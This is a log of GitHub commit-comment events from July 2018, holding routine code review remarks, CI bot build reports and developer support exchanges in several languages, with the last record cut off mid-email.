{"id":"8013508733","type":"CommitCommentEvent","actor":{"login":"TheBentoBox"},"repo":{"name":"mcMMO-Dev/mcMMO"},"payload":{"comment":{"id":29822215,"position":56,"line":258,"path":"src/main/java/com/gmail/nossr50/util/skills/SkillUtils.java","commit_id":"0a1559511a4f20169246e98a6565d388a0c8adac","created_at":"2018-07-25T00:42:04Z","updated_at":"2018-07-25T00:42:04Z","author_association":"CONTRIBUTOR","body":"Same here as I mentioned elsewhere (`Material.OAK_WOOD` is the six-sided bark oak block, `OAK_LOG` is the normal one that generates in trees)."}},"created_at":"2018-07-25T00:42:04Z"}
{"id":"8013511249","type":"CommitCommentEvent","actor":{"login":"Ezike"},"repo":{"name":"codewithfavour/RapidWebHomework2018"},"payload":{"comment":{"id":29822219,"position":null,"line":null,"path":null,"commit_id":"9567f01a9723ef42f673d92f993db0b4ea6cf188","created_at":"2018-07-25T00:43:06Z","updated_at":"2018-07-25T00:43:06Z","author_association":"NONE","body":"updated profile"}},"created_at":"2018-07-25T00:43:06Z"}
{"id":"8013511669","type":"CommitCommentEvent","actor":{"login":"StefStg"},"repo":{"name":"StefStg/JETILUA"},"payload":{"comment":{"id":29822220,"position":null,"line":null,"path":null,"commit_id":"de9f36c2d7a566385e4e73d9e55d56bf91871813","created_at":"2018-07-25T00:43:16Z","updated_at":"2018-07-25T00:43:16Z","author_association":"OWNER","body":"zxc"}},"created_at":"2018-07-25T00:43:16Z"}
{"id":"8013511956","type":"CommitCommentEvent","actor":{"login":"Ezike"},"repo":{"name":"codewithfavour/RapidWebHomework2018"},"payload":{"comment":{"id":29822222,"position":null,"line":null,"path":null,"commit_id":"9567f01a9723ef42f673d92f993db0b4ea6cf188","created_at":"2018-07-25T00:43:22Z","updated_at":"2018-07-25T00:43:22Z","author_association":"NONE","body":"profile"}},"created_at":"2018-07-25T00:43:22Z"}
{"id":"8013512430","type":"CommitCommentEvent","actor":{"login":"yiwenqingshen"},"repo":{"name":"yiwenqingshen/SuperMarketCashSystem"},"payload":{"comment":{"id":29822224,"position":null,"line":null,"path":null,"commit_id":"d89c72e551b3f53a81d5648691ec0c8ddf280168","created_at":"2018-07-25T00:43:34Z","updated_at":"2018-07-25T00:43:34Z","author_association":"OWNER","body":"具有cs架构，多线程，可以实现客户端登陆"}},"created_at":"2018-07-25T00:43:34Z"}
{"id":"8013513414","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29822226,"position":null,"line":null,"path":null,"commit_id":"9ce61879c2fd6fff191b0f2bbc404ea02efac09f","created_at":"2018-07-25T00:43:57Z","updated_at":"2018-07-25T00:43:57Z","author_association":"OWNER","body":"Build version: __`0.10.0-renovate/node-8.11.375`__ :crossed_fingers: [`renovate/node-8.11`](https://github.com/streamich/ci-scripts/tree/renovate/node-8.11) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/407862813) :tada:"}},"created_at":"2018-07-25T00:43:57Z"}
{"id":"8013514571","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MEWconnect-landing-page"},"payload":{"comment":{"id":29822228,"position":null,"line":null,"path":null,"commit_id":"bc66170c7be2d7edea023ac6bd872a58756049e0","created_at":"2018-07-25T00:44:25Z","updated_at":"2018-07-25T00:44:25Z","author_association":"NONE","body":"Copy of this build can be found at https://mewc.mewbuilds.com/build/bc66170c7be2d7edea023ac6bd872a58756049e0/index.html"}},"created_at":"2018-07-25T00:44:25Z"}
{"id":"8013516130","type":"CommitCommentEvent","actor":{"login":"mehrdadgit"},"repo":{"name":"MSFREACH/msf-reach"},"payload":{"comment":{"id":29822233,"position":null,"line":null,"path":null,"commit_id":"f708234d4ec0ac3b81ef1d1c779f727192ee603a","created_at":"2018-07-25T00:45:05Z","updated_at":"2018-07-25T00:45:05Z","author_association":"CONTRIBUTOR","body":"@matthewberryman seems like the same fix is needed for modal edit? submitEventData() in events/edit.html "}},"created_at":"2018-07-25T00:45:05Z"}
{"id":"8013523394","type":"CommitCommentEvent","actor":{"login":"matthewberryman"},"repo":{"name":"MSFREACH/msf-reach"},"payload":{"comment":{"id":29822255,"position":null,"line":null,"path":null,"commit_id":"f708234d4ec0ac3b81ef1d1c779f727192ee603a","created_at":"2018-07-25T00:47:53Z","updated_at":"2018-07-25T00:47:53Z","author_association":"CONTRIBUTOR","body":"thanks, just pushing now"}},"created_at":"2018-07-25T00:47:53Z"}
{"id":"8013525462","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29822259,"position":null,"line":null,"path":null,"commit_id":"c3c80e1ca44559d3cb1fcd85fd46ba66b12dbdb5","created_at":"2018-07-25T00:48:41Z","updated_at":"2018-07-25T00:48:41Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-275](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-275).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-275-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-25T00:48:41Z"}
{"id":"8013527336","type":"CommitCommentEvent","actor":{"login":"komalsrathi"},"repo":{"name":"komalsrathi/Microarray_Analysis"},"payload":{"comment":{"id":29822264,"position":null,"line":null,"path":null,"commit_id":"4ecef78e9425dea78c2ee610a18a1e0c3a0687f9","created_at":"2018-07-25T00:49:23Z","updated_at":"2018-07-25T00:49:23Z","author_association":"OWNER","body":"I am not sure what issue you are facing exactly -  you just posted the R version you are using. Unless you post the full code what you are trying to do, I can't help you. Best would be if you'd look at the documentation of oligo package. "}},"created_at":"2018-07-25T00:49:23Z"}
{"id":"8013527972","type":"CommitCommentEvent","actor":{"login":"Davidc2525"},"repo":{"name":"Davidc2525/HHCloud"},"payload":{"comment":{"id":29822266,"position":105,"line":100,"path":"src/App/components/explorer/MkdirDialog.jsx","commit_id":"f6f63f1088598041b6f71e649a0c6b22b49f92dc","created_at":"2018-07-25T00:49:38Z","updated_at":"2018-07-25T00:49:38Z","author_association":"OWNER","body":"Sugerencia de nuevo nombre de carpeta"}},"created_at":"2018-07-25T00:49:38Z"}
{"id":"8013533777","type":"CommitCommentEvent","actor":{"login":"mikaelhadler"},"repo":{"name":"mikaelhadler/vue2-github-api"},"payload":{"comment":{"id":29822285,"position":null,"line":null,"path":null,"commit_id":"27890e63d73eb1bd5450d3fb98a21074beef29e6","created_at":"2018-07-25T00:51:57Z","updated_at":"2018-07-25T00:51:57Z","author_association":"OWNER","body":"Nice dude!"}},"created_at":"2018-07-25T00:51:57Z"}
{"id":"8013538382","type":"CommitCommentEvent","actor":{"login":"namhv"},"repo":{"name":"ngochai4404/note"},"payload":{"comment":{"id":29822296,"position":17,"line":17,"path":"app/src/main/java/com/hai/note/activity/base/BaseActivity.java","commit_id":"1812d4a15c2f3d6081b770904f24a7b76a722eb5","created_at":"2018-07-25T00:53:49Z","updated_at":"2018-07-25T00:53:49Z","author_association":"COLLABORATOR","body":"Anh comment code mà, có ảnh gì đâu, anh đang comment ở dòng 17:\r\nStrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();"}},"created_at":"2018-07-25T00:53:49Z"}
{"id":"8013538956","type":"CommitCommentEvent","actor":{"login":"dscorbett"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29822297,"position":null,"line":null,"path":null,"commit_id":"62fa7cd1ccff4d4448ef84f9cc146464672636aa","created_at":"2018-07-25T00:54:04Z","updated_at":"2018-07-25T00:54:04Z","author_association":"CONTRIBUTOR","body":"The override for U+11134 is correct, but the other changes shouldn’t be released if they break common sequences.\r\n\r\nThe reason for my question above is that I’m trying to find a way to avoid visually indistinguishable inequivalent sequences. Unicode, as usual, provides no explicit guidance. The [Chakma Wikipedia](https://incubator.wikimedia.org/wiki/Wp/ccp) is inconsistent: it puts top vowel signs before _and_ after bottom vowel signs. Then again, it puts pre-base vowel signs in logical _and_ visual order, so maybe it is not a good source.\r\n\r\nIf it turns out that the desired order is top before bottom, except for <i>o</i> and <i>au</i>, it might work to override U+11127 CHAKMA VOWEL SIGN A to be VPst. Otherwise, there is nothing for it but to use OpenType’s USE overrides."}},"created_at":"2018-07-25T00:54:04Z"}
{"id":"8013539474","type":"CommitCommentEvent","actor":{"login":"pfg3000"},"repo":{"name":"pfg3000/Proyecto"},"payload":{"comment":{"id":29822298,"position":null,"line":null,"path":null,"commit_id":"7aefb3994f8580c27d8672934d195a98976498d7","created_at":"2018-07-25T00:54:16Z","updated_at":"2018-07-25T00:54:16Z","author_association":"OWNER","body":"http://www.infoagro.com/industria_auxiliar/control_climatico.htm\r\n\r\nposible link de interes"}},"created_at":"2018-07-25T00:54:16Z"}
{"id":"8013539546","type":"CommitCommentEvent","actor":{"login":"abbeymaree"},"repo":{"name":"cmda-be/transfer"},"payload":{"comment":{"id":29822299,"position":null,"line":null,"path":null,"commit_id":"b21edcca74a4db86d939ca9e795821658f5bcdb3","created_at":"2018-07-25T00:54:17Z","updated_at":"2018-07-25T00:54:17Z","author_association":"NONE","body":"@@ -476,11 +476,7 @@ function step11() { evs.on('request', onrequest); function onrequest(req, res) {- if (- req.url === '/nonexistent-movie' &&- req.method === 'HEAD' &&- res.statusCode === 404- ) {+ if (req.method === 'HEAD' && res.statusCode === 404) { evs.removeListener('request', onrequest); process.stdout.write(escapes.beep); step12();"}},"created_at":"2018-07-25T00:54:17Z"}
{"id":"8013541259","type":"CommitCommentEvent","actor":{"login":"isaias813ruh"},"repo":{"name":"isaias813ruh/blackskill"},"payload":{"comment":{"id":29822304,"position":null,"line":null,"path":null,"commit_id":"312d795ed0fc4616177d4e8423de2664e67b105b","created_at":"2018-07-25T00:54:58Z","updated_at":"2018-07-25T00:54:58Z","author_association":"OWNER","body":"vamos a lo grande....\r\n"}},"created_at":"2018-07-25T00:54:58Z"}
{"id":"8013541374","type":"CommitCommentEvent","actor":{"login":"dpilafian"},"repo":{"name":"center-key/clabe-validator"},"payload":{"comment":{"id":29822305,"position":null,"line":null,"path":null,"commit_id":"f9212fc21b61f0d23c27b2a7a0b3846beb0df808","created_at":"2018-07-25T00:55:01Z","updated_at":"2018-07-25T00:55:01Z","author_association":"MEMBER","body":"Oops, wrong title for commit.  See next commit for \"Release v1.0.3\""}},"created_at":"2018-07-25T00:55:01Z"}
{"id":"8013549815","type":"CommitCommentEvent","actor":{"login":"MachinoNekomata"},"repo":{"name":"MinatsuT/PSoC5_USB_Keyboard"},"payload":{"comment":{"id":29822335,"position":null,"line":null,"path":null,"commit_id":"b858528e7adf5951f246221cba2e3d8b4be47625","created_at":"2018-07-25T00:58:17Z","updated_at":"2018-07-25T00:58:17Z","author_association":"NONE","body":"早速のご連絡ありがとうございます。今しばらくお付き合いいただければ幸いです。\r\n　ご指摘のように、KitProgの平たいUSBコネクタにケーブルを追加し、PC(WIn7)と接続するように変更しました。（KitProgのUSBは切り取って使っていたため再度接続し、WIn7側でドライバ認識済みです。）\r\n　WIn10側にはPSoC5LPにのってあるmicroUSBコネクタをケーブルを経由して接続してあります。Win10のメモ帳ではPSoCを抜いて、再度接続すると、USB disconnectedの文字がメモ帳に出ます。\r\nWIn7側はTeraTermで9600（デフォルトでしょうか？COMの中身はこれでした）,38400,115200(Minatsu様の書かれたソースでUARTが1152を示していたのでこの速度だと勝手に思っておりした)いずれの場合も、Win7側のキーを叩くと（localecho有りで設定しております）、TeraTerm画面に大量の文字が表示されます。\r\nが、メモ帳には表示がありません（メモ帳側を何度か抜き差しすると、USB connected, disconnectedが表示されますが、Terminal側が文字を入れるたびに文字化けを大量に返します）。お知恵をお借りできれば幸いです。\r\n　\r\n![img_9295](https://user-images.githubusercontent.com/33615237/43173684-2ef577ee-8ff1-11e8-9389-0dd38a80816e.JPG)\r\n![img_9294](https://user-images.githubusercontent.com/33615237/43173685-2f215170-8ff1-11e8-8b29-724cc5d9b49f.JPG)\r\n![img_9293](https://user-images.githubusercontent.com/33615237/43173686-2f48e460-8ff1-11e8-8440-12b68a2c1dfa.JPG)\r\n\r\n\r\n"}},"created_at":"2018-07-25T00:58:17Z"}
{"id":"8013553246","type":"CommitCommentEvent","actor":{"login":"adhrinae"},"repo":{"name":"sujinleeme/babel-website"},"payload":{"comment":{"id":29822347,"position":31,"line":31,"path":"js/repl/TimeTravelSlider.js","commit_id":"8d2d242f5069e6f49c31a213ef6cd6a6e4ab8e16","created_at":"2018-07-25T00:59:39Z","updated_at":"2018-07-25T00:59:39Z","author_association":"NONE","body":"You don't need to use `bind` method as long as you use arrow function for the `handleMouse` method."}},"created_at":"2018-07-25T00:59:39Z"}
{"id":"8013559486","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29822379,"position":null,"line":null,"path":null,"commit_id":"d11e41fea458b2912e2c909627301913cee88d3e","created_at":"2018-07-25T01:01:56Z","updated_at":"2018-07-25T01:01:56Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-36](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-36).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-36-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-25T01:01:56Z"}
{"id":"8013561922","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29822385,"position":null,"line":null,"path":null,"commit_id":"be084e58412bdf2bdbf80b9782ac4314efac7358","created_at":"2018-07-25T01:02:54Z","updated_at":"2018-07-25T01:02:54Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1708 of 1708 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-25T01:02:54Z"}
{"id":"8013565793","type":"CommitCommentEvent","actor":{"login":"harlow"},"repo":{"name":"harlow/kinesis-consumer"},"payload":{"comment":{"id":29822391,"position":23,"line":145,"path":"README.md","commit_id":"b7be26418a4d8d9627c49ca0865a604a167d4d94","created_at":"2018-07-25T01:04:30Z","updated_at":"2018-07-25T01:04:30Z","author_association":"OWNER","body":"it's intended to be the name of the consumer (the \"app name\"). This way you can have multiple consumers of the same stream and they have their own checkpoints. \r\n\r\nin hindsight there may have been a more intention revealing name for this attribute"}},"created_at":"2018-07-25T01:04:30Z"}
{"id":"8013566629","type":"CommitCommentEvent","actor":{"login":"adhrinae"},"repo":{"name":"sujinleeme/babel-website"},"payload":{"comment":{"id":29822392,"position":59,"line":59,"path":"js/repl/TimeTravelSlider.js","commit_id":"8d2d242f5069e6f49c31a213ef6cd6a6e4ab8e16","created_at":"2018-07-25T01:04:50Z","updated_at":"2018-07-25T01:04:50Z","author_association":"NONE","body":"I suggest you to add more functionality to `handleMouse` method because it might cause performance issues if you inject lambda function directly to the component's prop.\r\n\r\nSo please reconsider another way to inject the function reference only."}},"created_at":"2018-07-25T01:04:50Z"}
{"id":"8013571784","type":"CommitCommentEvent","actor":{"login":"adhrinae"},"repo":{"name":"sujinleeme/babel-website"},"payload":{"comment":{"id":29822403,"position":47,"line":26,"path":"js/repl/TimeTravelSlider.js","commit_id":"a48aa7b770f570d27acc71dba00ddb5a0c54c8ed","created_at":"2018-07-25T01:06:53Z","updated_at":"2018-07-25T01:06:53Z","author_association":"NONE","body":"Perhaps should remove this line?"}},"created_at":"2018-07-25T01:06:53Z"}
{"id":"8013579061","type":"CommitCommentEvent","actor":{"login":"hardik66"},"repo":{"name":"eoscafe/eos-airdrops"},"payload":{"comment":{"id":29822416,"position":5,"line":8,"path":"README.md","commit_id":"97415bcefdca621f12ae984d1310f6f8e46b82ea","created_at":"2018-07-25T01:09:50Z","updated_at":"2018-07-25T01:09:50Z","author_association":"NONE","body":"I"}},"created_at":"2018-07-25T01:09:50Z"}
{"id":"8013582979","type":"CommitCommentEvent","actor":{"login":"hardik66"},"repo":{"name":"eoscafe/eos-airdrops"},"payload":{"comment":{"id":29822426,"position":4,"line":7,"path":"README.md","commit_id":"97415bcefdca621f12ae984d1310f6f8e46b82ea","created_at":"2018-07-25T01:11:22Z","updated_at":"2018-07-25T01:11:22Z","author_association":"NONE","body":"eosblackteam"}},"created_at":"2018-07-25T01:11:22Z"}
{"id":"8013584267","type":"CommitCommentEvent","actor":{"login":"joefitzgerald"},"repo":{"name":"onsi/gomega"},"payload":{"comment":{"id":29822429,"position":null,"line":null,"path":null,"commit_id":"4bb581de2267ae3b1171b4c084ab7055fb5530fb","created_at":"2018-07-25T01:11:50Z","updated_at":"2018-07-25T01:11:50Z","author_association":"NONE","body":"In go 1.11, the go tool downloads dependencies during build or test operations. This is a side effect of the introduction of go modules support. If you take a look at the failed build prior, you can see the issue. Sadly `go get -v -t ./...` informs you that the `-t` flag is ignored when modules are enabled.\r\n\r\nSee also: https://groups.google.com/forum/#!topic/golang-dev/a5PqQuBljF4"}},"created_at":"2018-07-25T01:11:50Z"}
{"id":"8013584281","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29822430,"position":null,"line":null,"path":null,"commit_id":"a1cc074f5750d3cc12bc04be8cf8292bb09aff7f","created_at":"2018-07-25T01:11:51Z","updated_at":"2018-07-25T01:11:51Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - i386-Windows-7-VisualStudio-14: OK (2945 of 2946 tests passed, 18 test warnings)\n\nMessages:\n\n * 18 tests had: AUD diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 623\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a1cc074f5750d3cc12bc04be8cf8292bb09aff7f-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-25T01:11:51Z"}
{"id":"8013589843","type":"CommitCommentEvent","actor":{"login":"hardik66"},"repo":{"name":"eoscafe/eos-airdrops"},"payload":{"comment":{"id":29822441,"position":9,"line":15,"path":"tokens.json","commit_id":"66b25d617823344611f4ad8c440776fe95ed2911","created_at":"2018-07-25T01:14:04Z","updated_at":"2018-07-25T01:14:04Z","author_association":"NONE","body":"challengedac"}},"created_at":"2018-07-25T01:14:04Z"}
{"id":"8013590898","type":"CommitCommentEvent","actor":{"login":"spencern"},"repo":{"name":"reactioncommerce/reaction"},"payload":{"comment":{"id":29822445,"position":null,"line":null,"path":null,"commit_id":"45c1766d2b87695d84490ecc1790be8e002738f7","created_at":"2018-07-25T01:14:29Z","updated_at":"2018-07-25T01:14:29Z","author_association":"MEMBER","body":"@nnnnat I think twilio and nexmo were removed in a recent PR, so this may not be necessary anymore."}},"created_at":"2018-07-25T01:14:29Z"}
{"id":"8013597026","type":"CommitCommentEvent","actor":{"login":"DrSquee"},"repo":{"name":"DrSquee/recipes"},"payload":{"comment":{"id":29822456,"position":null,"line":null,"path":null,"commit_id":"2659edf92fe8f35e8908b33f43b3c76a9e541647","created_at":"2018-07-25T01:16:48Z","updated_at":"2018-07-25T01:16:48Z","author_association":"OWNER","body":"there is a typo"}},"created_at":"2018-07-25T01:16:48Z"}
{"id":"8013597681","type":"CommitCommentEvent","actor":{"login":"jeffand123"},"repo":{"name":"kaduke/Netgear-A6210"},"payload":{"comment":{"id":29822457,"position":null,"line":null,"path":null,"commit_id":"654ce59d1babed82f41a7f380a125ef7421d8541","created_at":"2018-07-25T01:17:04Z","updated_at":"2018-07-25T01:17:04Z","author_association":"NONE","body":"first off just wanted to thank you this is the first time i was able to install any driver for this chipset and believe me I have found plenty of fixes of the original build but this is the only one that somewhat works gonna try a couple of things to fix myself but thank you for your hard work"}},"created_at":"2018-07-25T01:17:04Z"}
{"id":"8013599630","type":"CommitCommentEvent","actor":{"login":"StefStg"},"repo":{"name":"StefStg/JETILUA"},"payload":{"comment":{"id":29822461,"position":null,"line":null,"path":null,"commit_id":"cb2d4c8e46535fbb21a8e6f353e79622f3a34b66","created_at":"2018-07-25T01:17:49Z","updated_at":"2018-07-25T01:17:49Z","author_association":"OWNER","body":"sd"}},"created_at":"2018-07-25T01:17:49Z"}
{"id":"8013608994","type":"CommitCommentEvent","actor":{"login":"sahilk335"},"repo":{"name":"ravi-dafauti/Algoritms"},"payload":{"comment":{"id":29822491,"position":null,"line":null,"path":null,"commit_id":"17da174511772526887181894b6afcbcbedf3503","created_at":"2018-07-25T01:21:34Z","updated_at":"2018-07-25T01:21:34Z","author_association":"NONE","body":"Jane kitne dino ke baad. Gali mei aaj Chand nikla :p"}},"created_at":"2018-07-25T01:21:34Z"}
{"id":"8013609868","type":"CommitCommentEvent","actor":{"login":"OmrSi"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":29822493,"position":null,"line":null,"path":null,"commit_id":"442dddfea636602c4b1af2e11dd235f4735618bf","created_at":"2018-07-25T01:21:54Z","updated_at":"2018-07-25T01:21:54Z","author_association":"NONE","body":"This problem is happening now with the original subtitle, opened is saved but original when using the shortcut isn't."}},"created_at":"2018-07-25T01:21:54Z"}
{"id":"8013614991","type":"CommitCommentEvent","actor":{"login":"EmmaNguyen"},"repo":{"name":"EmmaNguyen/feature_adversarial_with_topology_signatures"},"payload":{"comment":{"id":29822505,"position":null,"line":null,"path":null,"commit_id":"84e139720fd51481c01789e275eaf656b8463862","created_at":"2018-07-25T01:23:52Z","updated_at":"2018-07-25T01:23:52Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Code: Implement Gromov-Weierstrass for distance geometry mode regularization:Implement POT into my fancy messy code::Parallel process](https://trello.com/c/IpxPZggC/87-code-implement-gromov-weierstrass-for-distance-geometry-mode-regularizationimplement-pot-into-my-fancy-messy-codeparallel-proces)"}},"created_at":"2018-07-25T01:23:52Z"}
{"id":"8013648627","type":"CommitCommentEvent","actor":{"login":"duplicatibot"},"repo":{"name":"duplicati/duplicati"},"payload":{"comment":{"id":29822596,"position":null,"line":null,"path":null,"commit_id":"38a8d1126690be9619f6323e0498eca5db7efa3e","created_at":"2018-07-25T01:36:24Z","updated_at":"2018-07-25T01:36:24Z","author_association":"NONE","body":"This commit has been mentioned on **Duplicati**. There might be relevant details there:\n\nhttps://forum.duplicati.com/t/smart-retention-problem-w-google-drive/3970/18\n"}},"created_at":"2018-07-25T01:36:24Z"}
{"id":"8013655842","type":"CommitCommentEvent","actor":{"login":"bozis92"},"repo":{"name":"RH1CK/CubePlay"},"payload":{"comment":{"id":29822615,"position":null,"line":null,"path":null,"commit_id":"9017a6501f6bf4b77912ea60b1585372b26a969d","created_at":"2018-07-25T01:39:07Z","updated_at":"2018-07-25T01:39:07Z","author_association":"NONE","body":"redecanais ainda sem funcionae"}},"created_at":"2018-07-25T01:39:07Z"}
{"id":"8013662262","type":"CommitCommentEvent","actor":{"login":"alaviss"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29822726,"position":10,"line":10,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-25T01:41:26Z","updated_at":"2018-07-25T01:41:26Z","author_association":"CONTRIBUTOR","body":"We should certainly avoid recipe downloading stuff during build time.\r\n\r\n@KapiX Yeah, the only difference is that the tarball I referred to have pre-generated configure script, so aclocal and friends can be dropped."}},"created_at":"2018-07-25T01:41:26Z"}
{"id":"8013663237","type":"CommitCommentEvent","actor":{"login":"biubiubiu123"},"repo":{"name":"biubiubiu123/one"},"payload":{"comment":{"id":29822817,"position":1,"line":1,"path":"dev.txt","commit_id":"4ae392e46b3054c6e774fa0a532041160f96bd3d","created_at":"2018-07-25T01:41:44Z","updated_at":"2018-07-25T01:41:44Z","author_association":"OWNER","body":"remote add xxxx"}},"created_at":"2018-07-25T01:41:44Z"}
{"id":"8013665546","type":"CommitCommentEvent","actor":{"login":"rgrempel"},"repo":{"name":"Gizra/elm-restful"},"payload":{"comment":{"id":29822827,"position":19,"line":860,"path":"src/Restful/Login.elm","commit_id":"61143b7c29f6d91e13cac2f4d6f54a24487c5d38","created_at":"2018-07-25T01:42:39Z","updated_at":"2018-07-25T01:42:39Z","author_association":"MEMBER","body":"Ah, yes -- nice catch!"}},"created_at":"2018-07-25T01:42:39Z"}
{"id":"8013672604","type":"CommitCommentEvent","actor":{"login":"micky387"},"repo":{"name":"berkeley-dev/android_device_huawei_kirin970-common"},"payload":{"comment":{"id":29822838,"position":null,"line":null,"path":null,"commit_id":"2f701c90fa6fc6e92bae16a4127279e32fe2f3ac","created_at":"2018-07-25T01:45:17Z","updated_at":"2018-07-25T01:45:17Z","author_association":"NONE","body":"Ok, thank you"}},"created_at":"2018-07-25T01:45:17Z"}
{"id":"8013675282","type":"CommitCommentEvent","actor":{"login":"msqr"},"repo":{"name":"SolarNetwork/solarnetwork-node"},"payload":{"comment":{"id":29822846,"position":4,"line":13,"path":"net.solarnetwork.node.weather.ibm.wc.test/META-INF/MANIFEST.MF","commit_id":"11cd38d06f0ad1125b58183c78a09dc1b90ac1fc","created_at":"2018-07-25T01:46:12Z","updated_at":"2018-07-25T01:46:12Z","author_association":"CONTRIBUTOR","body":"I encourage using hamcrest via the `assertThat()` JUnit method, FYI. Not necessary to change what you've already done, but a note for future tests. Example [here](https://github.com/SolarNetwork/solarnetwork-node/blob/20bd880e693851ebcc7437758d081e2adc2426a7/net.solarnetwork.node.weather.yr.test/src/net/solarnetwork/node/weather/yr/test/XmlYrClientTests.java#L88-L89)."}},"created_at":"2018-07-25T01:46:12Z"}
{"id":"8013675510","type":"CommitCommentEvent","actor":{"login":"fragsman"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29822847,"position":null,"line":null,"path":null,"commit_id":"f8c5e5dc81509bba74adf89cecce4cd775a9e424","created_at":"2018-07-25T01:46:16Z","updated_at":"2018-07-25T01:46:16Z","author_association":"COLLABORATOR","body":"Me quedó todo muy claro caballero. jeje. Es un tema si.. todo avanza\nrapidísimo y con lo grande e importante que es spring probablemente en\nalgun momento no muy lejano muera y lo cambien por otra cosa :D\n\n\nEl 23 de julio de 2018, 19:52, Ramiro Ongaro <notifications@github.com>\nescribió:\n\n>\n>    1. No confundan spring con los jsp... Eso que tienen ahí es un .jsp\n>    que es otra tecnología. Sí spring puede usar jsp, pero no son \"de spring\"\n>    digamos.\n>    2. Desde el punto de vista conceptual es un error que llegue algo así\n>    a la vista. Ustedes deberían usar DTO's (data transfer object) como\n>    recomendé en alguna teoría. Si no la vista termina \"quedando atada\" al\n>    modelo. A parte de exponer el modelo así como así (peligroso por cuestiones\n>    de seguridad por ejemplo como dijo jony en su momento), etc, etc, etc\n>    3. Sinceramente no se específicamente por dentro cómo funcionan los\n>    .jsp pero supongo que al igual que spring en ciertos casos harán uso de\n>    \"reflection\". Como también acotó jony en clases, al usar reflection no es\n>    necesario que los atributos tengan getters o setters o sean públicos. Esto\n>    hace (por ejemplo en el caso de Spring) que la única condición\n>    estrictamente necesaria que tiene que tener el modelo, es tener un\n>    constructor sin parámetros. Para todo lo demás puede hacer uso de\n>    reflection y de manera \"forzosa\" acceder a todo lo que necesite para poder\n>    darte el objeto o guardarlo. ¿No te gusta? (no se me ocurrió una mejor\n>    frase, perdón! hey! va de buen rollo je) hablá con los flacos de java\n>    porque ese reflection es de java... no de spring... Spring solo lo\n>    \"explota\". Supongo que justamente su objetivo es simplemente imponerte la\n>    menor condición de reglas para usarlo. Supongo que con eso en mente\n>    llegaron a esto. Decisiones son decisiones... Es feo? coincido, pero si el\n>    objetivo es lo que dije, la mejor manera era esta (al menos en comparación).\n>    4. Spring es el estandar defacto. Muchas veces para tener\n>    reconocimiento y ser usado, no hace falta \"hacer lo mejor de lo mejor\",\n>    sino llegar rápido y que la gente lo adopte rápido. Si vamos al caso, Java\n>    tiene muuuuchísimas cosas feas, PHP, también, etc y siguen siendo lenguajes\n>    usados... ¿Eventualmente morirán? Seguramente... como todo en la\n>    informática, pero es lo que hay. ¿Pueden ser mejor? seguro! como todo en la\n>    informática...\n>    De cualquier manera insisto en que hay que ver el panorama general de\n>    por qué se tomaron ciertas decisiones. Nunca, nada jamás, \"va a ser\n>    perfecto\". Lo importante del curso es entender eso y saber justificar las\n>    decisiones. Estoy seguro que toda esta gente podrá hacerlo. A parte uno no\n>    puede preveer siempre el futuro y \"evolucionar de la mejor manera\". Ya 